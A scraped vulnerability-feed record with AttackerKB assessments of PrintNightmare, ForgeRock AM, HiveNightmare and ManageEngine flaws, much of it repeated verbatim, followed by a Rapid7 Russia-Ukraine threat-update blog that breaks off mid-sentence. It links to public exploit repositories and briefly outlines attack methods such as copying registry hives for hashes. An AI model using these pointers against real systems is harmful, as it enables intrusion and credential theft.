"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "href": "https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:33:50", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**kevthehermit** at June 30, 2021 1:53pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**andretorresbr** at July 02, 2021 2:37am UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**architect00** at July 01, 2021 1:46pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**NinjaOperator** at June 29, 2021 5:55pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**ccondon-r7** at July 01, 2021 1:43pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-1675", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-10-07T00:00:00", "id": "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "href": "https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-30T20:26:22", "description": "ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier\n\n \n**Recent assessments:** \n \n**ccondon-r7** at June 30, 2021 2:35pm UTC reported:\n\nTrivial RCE with a one-line request. Rapid7 Labs is seeing this product in quite a few large enterprises\u2014patch quickly. Shout-out to Portswigger for their excellent write-up: <https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464>\n\nUpdate July 12, 2021: We now have reliable private reports of exploitation in the wild.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:00:00", "type": "attackerkb", "title": "Pre-auth RCE in ForgeRock Access Manager (CVE-2021-35464)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35464"], "modified": "2023-10-07T00:00:00", "id": "AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E", "href": "https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:40:12", "description": "Windows Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**Dviros** at July 25, 2021 9:35am UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing to parse the hashes while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\n**ccondon-r7** at July 21, 2021 4:24pm UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing to parse the hashes while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-36934 Windows Elevation of Privilege", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2023-10-07T00:00:00", "id": "AKB:68C898AA-7786-44EB-AA49-BDCE98588D8C", "href": "https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T16:42:03", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at November 08, 2021 3:18pm UTC reported:\n\nRapid7\u2019s services teams are observing opportunistic exploitation of this vulnerability in the wild. Sounds like coin miners are the payload so far.\n\n**wvu-r7** at September 15, 2021 8:54am UTC reported:\n\nRapid7\u2019s services teams are observing opportunistic exploitation of this vulnerability in the wild. Sounds like coin miners are the payload so far.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-40539", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-15T00:00:00", "id": "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "href": "https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-03-16T21:28:40", "description": "![Russia-Ukraine Cybersecurity Updates](https://blog.rapid7.com/content/images/2022/03/ru-security-updates.jpg)\n\nCyberattacks are a distinct concern in the [Russia-Ukraine conflict](<https://www.rapid7.com/blog/tag/russia-ukraine-conflict/>), with the potential to impact individuals and organizations far beyond the physical frontlines. With events unfolding rapidly, we want to provide a single channel by which we can communicate to the security community the major cyber-related developments from the conflict each day.\n\nEach business day, we will update this blog at 5 pm EST with what we believe are the need-to-know updates in cybersecurity and threat intelligence relating to the Russia-Ukraine conflict. We hope this blog will make it easier for you to stay current with these events during an uncertain and quickly changing time.\n\n* * *\n\n## March 16, 2022\n\nUkrainian President Volodymyr Zelenskyy [delivered a virtual speech](<https://www.nbcnews.com/politics/congress/zelenskyy-expected-press-us-military-support-address-congress-rcna20088>) to US lawmakers on Wednesday, asking again specifically for a no-fly zone over Ukraine and for additional support. \n\nThe White House released a new [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/16/fact-sheet-on-u-s-security-assistance-for-ukraine/>) detailing an additional $800 million in security assistance to Ukraine. \n\n**Threat Intelligence Update**\n\n * ******UAC-0056 targets Ukrainian entities******\n\nSentinelOne researchers reported that UAC-0056 targeted Ukrainian entities using a malicious Python-based package, masquerading as a Ukrainian language translation software. Once installed, the fake app deployed various malware, such as Cobalt Strike, GrimPlant, and GraphSteel.\n\n_Source: [Sentinel One](<https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/>)_\n\n * ******A ****h****acker was caught routing calls to Russian troops******\n\nThe Security Service of Ukraine claimed to have arrested a hacker that helped deliver communications from within Russia to the Russian troops operating in the Ukrainian territory. The hacker also sent text messages to\n\nUkrainian security officers and civil servants, exhorting them to surrender.\n\n_Source: [The Verge](<https://www.theverge.com/2022/3/15/22979381/phone-relay-capture-russia-military-unencrypted-communications-ukraine>)_\n\n## March 15, 2022\n\nThe Ukrainian Ministry of Defense [leaked documents](<https://www.scmagazine.com/analysis/breach/in-a-first-ukraine-leaks-russian-intellectual-property-as-act-of-war>) of a Russian nuclear power plant. This may be the first-ever instance of a hack-and-leak operation to weaponize the disclosure of intellectual property to harm a nation.\n\nResearchers at INFOdocket, a subsidiary of [Library Journal](<https://en.wikipedia.org/wiki/Library_Journal>), have [created](<https://www.infodocket.com/2022/03/10/briefings-reports-and-updates-about-the-conflict-in-ukraine-from-the-congressional-research-service-european-parliament-research-service-and-uk-house-of-commons-library/>) a compendium of briefings, reports, and updates about the conflict in Ukraine from three research organizations: Congressional Research Service (CRS), European Parliament Research Service (EPRS), and the UK House of Commons Library. The resource will be updated as each of the three organizations releases relevant new content.\n\nThe Wall Street Journal [is reporting](<https://www.wsj.com/articles/russian-prosecutors-warn-western-companies-of-arrests-asset-seizures-11647206193>) that Russian prosecutors have issued warnings to Western companies in Russia, threatening to arrest corporate leaders there who criticize the government or to seize assets of companies that withdraw from the country. \n\nRussia may [default on $117 million (USD) in interest payments](<https://qz.com/2142075/sanctions-are-likely-to-force-russia-to-default-on-foreign-debt/>) on dollar-denominated bonds due to Western sanctions, the first foreign debt default by Russia since 1918.\n\nReuters is [reporting](<https://www.usnews.com/news/world/articles/2022-03-14/russian-delegation-suspends-participation-in-council-of-europe-body-ria>) that Russia's delegation to the Parliamentary Assembly of the Council of Europe (PACE) is suspending its participation and will not take part in meetings. \n\nCNN [reports](<https://www.cnn.com/europe/live-news/ukraine-russia-putin-news-03-15-22/h_3f0d63658ac5c2875ed265df00ba8b40>) that Russia has imposed sanctions against US President Joe Biden, his son, Secretary of State Antony Blinken, other US officials, and \u201cindividuals associated with them,\u201d the Russian Foreign Ministry said in a statement on Tuesday.\n\n**Threat Intelligence Update**\n\n * ******Russian ****s****tate-****s****ponsored ****c****yber ****a****ctors ****a****ccess ****n****etwork ****m****isconfigured with ****d****efault MFA ****p****rotocols******\n\nCISA and the Federal Bureau of Investigation (FBI) have released a joint Cybersecurity Advisory that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. The actors then exploited a critical Windows Print Spooler vulnerability, [\u201cPrintNightmare\u201d (CVE-2021-34527)](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>), to run arbitrary code with system privileges.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>)_\n\n * ******Fake antivirus updates used to deploy Cobalt Strike in Ukraine******\n\nUkraine's Computer Emergency Response Team is warning that threat actors are distributing fake Windows antivirus updates that install Cobalt Strike and other malware. The phishing emails impersonate Ukrainian government agencies offering ways to increase network security and advise recipients to download \"critical security updates,\" which come in the form of a 60 MB file named \"BitdefenderWindowsUpdatePackage.exe.\"\n\n_Source: [BleepingComputer/CERT-UA](<https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/amp/>)_\n\n * ******A ****n****ovel ****w****iper ****t****argets Ukrainian ****e****ntities******\n\nCybersecurity researchers observed the new CaddyWiper malware targeting Ukrainian organizations. Once deployed, CaddyWiper destroys and overwrites the data from any drives that are attached to the compromised system. Despite being released in close proximity to other wiping malware targeting Ukraine, such as HermeticWiper and IsaacWiper, CaddyWiper does not share any significant code similarities with them and appears to be created separately.\n\n_Source:[ Bleeping Computer](<https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/amp/>)_\n\n * ******German Federal Office for Information Security ****a****gency ****i****ssues an ****a****lert for Russian ****a****ntivirus ****s****oftware Kaspersky******\n\nThe German Federal Office for Information Security agency (BSI) issued an alert urging its citizens to replace Kaspersky antivirus software with another defense solution, due to alleged ties to the Kremlin. The agency suggested Kaspersky could be used as a tool in the cyber conflict between Russia and Ukraine.\n\n_Source:[ BSI](<https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html>)_\n\n## March 14, 2022\n\nThe EU-based NEXTA media group has [reported](<https://twitter.com/nexta_tv/status/1503393046351781892?s=20&t=1tA7lZrLVe-cZpHb9wy2LA>) that Russia is starting to block VPN services.\n\nBermuda\u2019s aviation regulator [said](<https://financialpost.com/pmn/business-pmn/bermuda-revokes-licenses-for-russian-operated-planes-over-safety-concerns>) it is suspending certification of all Russian-operated airplanes registered in the British overseas territory due to international sanctions over the war in Ukraine, in a move expected to affect more than 700 planes.\n\nThe Washington Post [reported](<https://www.washingtonpost.com/world/2022/03/12/russia-putin-google-apple-navalny/>) that Federal Security Service (FSB), Russian Federalnaya Sluzhba Bezopasnosti, agents approached Google and Apple executives with requests to remove apps created by activist groups.\n\nAmnesty International [said](<https://www.amnesty.org/en/latest/news/2022/03/russia-authorities-block-amnesty-internationals-russian-language-website/>) Russian authorities have blocked their Russian-language website. \n\n**Threat Intelligence Update**\n\n * ******Anonymous claims to hack Rosneft, German subsidiary of Russian energy******\n\nAnonymous claimed to hack the German branch of the Russian energy giant Rosneft, allegedly stealing 20 TB of data. The company systems were significantly affected by the attack, although there currently seems to be no effect on the company's energy supply.\n\n_Source:[ Security Affairs](<https://securityaffairs.co/wordpress/129052/hacktivism/anonymous-hacked-german-subsidiary-rosneft.html>)_\n\n * ******Russia blocks access to Instagram nationwide******\n\nRussia's Internet moderator Roskomnadzor decided to block Instagram access in the country, following Meta's decision to allow \"calls for violence against Russian citizens.\" The federal agency gave Instagram users 48 hours to prepare and finally completed the act on March 13. The blocking of Instagram follows the former ban of Facebook and Twitter in Russia last week.\n\n_Source:[ Cyber News](<https://cybernews.com/cyber-war/instagram-is-no-longer-accessible-in-russia/?utm_source=youtube&utm_medium=cn&utm_campaign=news_CNN_047_instagram_blocked_in_russia&utm_term=2v1_yubOBMc&utm_content=direct_article>)_\n\n## March 11, 2022\n\nPresident Biden, along with the European Union and the Group of Seven Countries, [moved](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/11/fact-sheet-united-states-european-union-and-g7-to-announce-further-economic-costs-on-russia/>) to revoke \u201cmost favored nation\u201d trade status for Russia, deny borrowing privileges at multilateral financial institutions, apply sanctions to additional Russian elites, ban export of luxury goods to Russia, and ban US import of goods from several signature sectors of Russia\u2019s economy.\n\n**Threat Intelligence Update**\n\n * **Amid difficulties with renewing certificates, Russia has created its own trusted TLS certificate authority**\n\nSigning authorities based in countries that have imposed sanctions on Russia can no longer accept payments for their services, leaving many sites with no practical means to renew expiring certificates. As a result, the Russian Ministry of Digital Development announced the availability of domestic certificates, replacing expired or revoked foreign certificates.\n\n_Source: [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/>)_\n\n * ******Triolan, ****a**** major Ukrainian internet service provider****,**** was hacked \u2014 twice******\n\nTriolan, a Ukraine-based ISP with more than half a million subscribers, was reportedly hacked initially on February 24th, with a second attack hitting on March 9th. The company reported that the threat actors managed to hack into key components of the network, some of which couldn\u2019t be recovered.\n\n_Source: [Forbes](<https://www.forbes.com/sites/thomasbrewster/2022/03/10/cyberattack-on-major-ukraine-internet-provider-causes-major-outages/?sh=768d17596573>)_\n\n## March 10, 2022\n\nBy [order of President Putin](<https://twitter.com/KevinRothrock/status/1501935395092631556?s=20&t=TvFRrQvNfQ6OL3qvFJePQg>), Russia\u2019s Economic Development Ministry has drafted a bill that would effectively nationalize assets and businesses \"abandoned\" in Russia by foreign corporations. Management of these seized assets will be entrusted to the VEB.RF state development corporation and to Russia\u2019s Deposit Insurance Agency.\n\nRussia has [effectively legalized patent theft](<http://publication.pravo.gov.ru/Document/View/0001202203070005?index=0&rangeSize=1>) from anyone affiliated with countries \u201cunfriendly\u201d to it, declaring that unauthorized use will not be compensated. The Russian news agency Tass has [further reporting](<https://tass.ru/ekonomika/13982403>) on this, as does the [Washington Post](<https://www.washingtonpost.com/business/2022/03/09/russia-allows-patent-theft/>).\n\nGoldman Sachs Group Inc [announced it was closing its operations in Russia](<https://www.reuters.com/business/finance/goldman-sachs-exit-russia-bloomberg-news-2022-03-10/>), becoming the first major Wall Street bank to exit the country following Moscow's invasion of Ukraine.\n\nUK Foreign Secretary Liz Truss [announced](<https://www.gov.uk/government/news/abramovich-and-deripaska-among-seven-oligarchs-targeted-in-estimated-15bn-sanction-hit>) a full asset freeze and travel ban on seven of Russia\u2019s wealthiest and most influential oligarchs, whose business empires, wealth, and connections are closely associated with the Kremlin.\n\nUS Vice President Kamala Harris [announced](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/10/vice-president-kamala-harris-announces-additional-u-s-funding-to-respond-to-humanitarian-needs-in-ukraine-and-eastern-europe/>) nearly $53 million in new humanitarian assistance from the United States government, through the US Agency for International Development (USAID), to support innocent civilians affected by Russia\u2019s invasion of Ukraine.\n\nThe International Atomic Energy Agency (IAEA) [provided an update](<https://www.iaea.org/newscenter/pressreleases/update-17-iaea-director-general-statement-on-situation-in-ukraine>) on the situation at the Chernobyl Nuclear Power Plant. The IAEA Director General said that the Agency is aware of reports that power has now been restored to the site and is looking for confirmation. At the same time, Ukraine informed them that today it had lost all communications with the facility. The IAEA has assured the international community that there has been \u201cno impact on essential safety systems.\u201d\n\n**Threat Intelligence Update**\n\n * **New malware variant targeting Russia named RURansom**\n\nRURansom is a malware variant that was recently discovered and appears to be targeting Russia. While it was initially suspected of being a ransomware, further analysis suggests it is actually a wiper. So far, no active non-Russian targets have been identified, likely due to the malware targeting specific entities.\n\n_Source: [TrendMicro](<https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html>)_\n\n_Available in Threat Library as: RURansom_\n\n * ******Kaspersky source code leak seems to be just a collection of publicly available HTML files******\n\nThe hacking group NB65 claimed on social networks to have leaked source code from the Russian antivirus firm Kaspersky. However, it appears that the leaked files are nothing more than a long list of HTML files and other related, publicly available web resources.\n\n_Source: [Cybernews](<https://cybernews.com/cyber-war/long-awaited-kaspersky-leak-doesnt-seem-to-be-a-leak-at-all/>)_\n\n * ******Anonymous claims to hack Roskomnadzor, a Russian federal agency******\n\nHacktivist group Anonymous claims to have breached Roskomnadzor, a Russian federal agency responsible for monitoring, controlling, and censoring Russian mass media, leaking over 360,000 (817.5 GB) files. Based on the report, the leak contains relatively recent censored documents, dated as late as March 5, and demonstrates Russia\u2019s attempts to censor media related to the conflict in Ukraine.\n\n_Source: @AnonOpsSE via [Twitter](<https://twitter.com/AnonOpsSE/status/1501944150794506256>) _\n\n## March 9, 2022\n\n**Public policy:** Citing concerns over rising cybersecurity risks related to the Russia-Ukraine conflict, the US is poised to enact new cyber incident reporting requirements. The_ _[Cyber Incident Reporting for Critical Infrastructure Act of 2022](<https://www.congress.gov/bill/117th-congress/senate-bill/3600/text?q=%7B%22search%22%3A%5B%22s+3600%22%2C%22s%22%2C%223600%22%5D%7D&r=3&s=2>):\n\n * Will require critical-infrastructure owners and operators to report cybersecurity incidents to CISA within 72 hours of determining the incident is significant enough that reporting is required;\n * Will require critical infrastructure owners and operators to report ransomware payments to CISA within 24 hours; and\n * Is intended to give federal agencies more insight into attack trends and potentially provide early warnings of major vulnerabilities or attacks in progress before they spread.\n\nThe Bank of Russia [established](<https://www.cbr.ru/eng/press/event/?id=12744>) temporary procedures for foreign cash transactions, suspending sales of foreign currencies until September 9, 2022. Foreign currency accounts are limited to withdrawals up to $10,000 USD.\n\nThe Financial Crimes Enforcement Network (FinCEN) is [alerting all financial institutions](<https://www.fincen.gov/index.php/news/news-releases/fincen-advises-increased-vigilance-potential-russian-sanctions-evasion-attempts>) to be vigilant against efforts to evade the expansive sanctions and other US-imposed restrictions implemented in connection with the Russian Federation\u2019s further invasion of Ukraine.\n\nThe Pentagon [dismissed](<https://www.cnn.com/2022/03/08/politics/poland-jets-ukraine-russia/index.html>) Poland\u2019s offer to transfer MIG-29 fighter jets to the United States for delivery to Ukraine, stating they did not believe the proposal was \u201ctenable.\u201d\n\n**Threat Intelligence Update**\n\n * ******Multiple hacking groups target Ukrainians and other European ****a****llies via ****p****hishing ****a****ttacks******\n\nSeveral threat actors, including Fancy Bear, Ghostwriter, and Mustang Panda, have launched a large phishing campaign against Ukraine, Poland, and other European entities amid Russia's invasion of Ukraine. \n\n_Source: [The Hacker News](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>)_\n\n_Available in Threat Library as: APT28 (Fancy Bear), Ghostwriter, Mustang Panda_\n\n * ******The Conti Ransomware group resumes activity following leaks******\n\nThe Conti Ransomware group appears to have made a comeback following the [leak of its internal chats last week](<https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/>). On March 9, Rapid7 Threat Intelligence observed renewed activity on Conti\u2019s onion site, and CISA released new IOCs related to the group on their Conti alert page.\n\n_Source: [CISA](<https://www.cisa.gov/uscert/ncas/alerts/aa21-265a>)_\n\n_Available in Threat Library as: Conti_\n\n * ******The Belarusian group UNC1151 targets Ukrainian organizations using MicroBackdoor malware******\n\nThe Ukrainian government has reported on a continuous cyberattack on state organizations of Ukraine using malicious software Formbook.\n\n_Source: [Ukrainian CERT](<https://cert.gov.ua/article/37626>)_\n\n_Available in Threat Library as: UNC1151_\n\n## March 8, 2022\n\nThe US [announced](<https://www.whitehouse.gov/briefing-room/presidential-actions/2022/03/08/executive-order-on-use-of-project-labor-agreements-for-federal-construction-projects-2/>) a ban on imports of Russian oil, gas, and other energy products. New US investments in the Russian energy sector are also restricted. The UK [announced](<https://www.gov.uk/government/news/uk-to-phase-out-russian-oil-imports>) it would phase out Russian oil over 2022. \n\nThe International Atomic Energy Agency [published a statement](<https://www.iaea.org/newscenter/pressreleases/update-15-iaea-director-general-statement-on-situation-in-ukraine>) noting that remote data transmission from monitoring systems at Ukraine\u2019s mothballed Chernobyl nuclear power plant has been lost. No network data has been observed by internet monitoring companies since March 5, 2022.\n\nChris Chivvis, a senior fellow and director of the American Statecraft Program at the Carnegie Endowment for International Peace, has provided [an assessment](<https://carnegieendowment.org/2022/03/03/how-does-this-end-pub-86570>) of two likely trajectories in the Russia-Ukraine conflict. \n\nTwitter [announced](<https://twitter.com/AlecMuffett/status/1501282223009542151?s=20&t=tO-TNZw5ct6tZUcwyvMl4A>) they have made their social network available on the Tor Project onion service, which will enable greater privacy, integrity, trust, and availability to global users.\n\nThe Minister of Foreign Affairs of the Republic of Poland 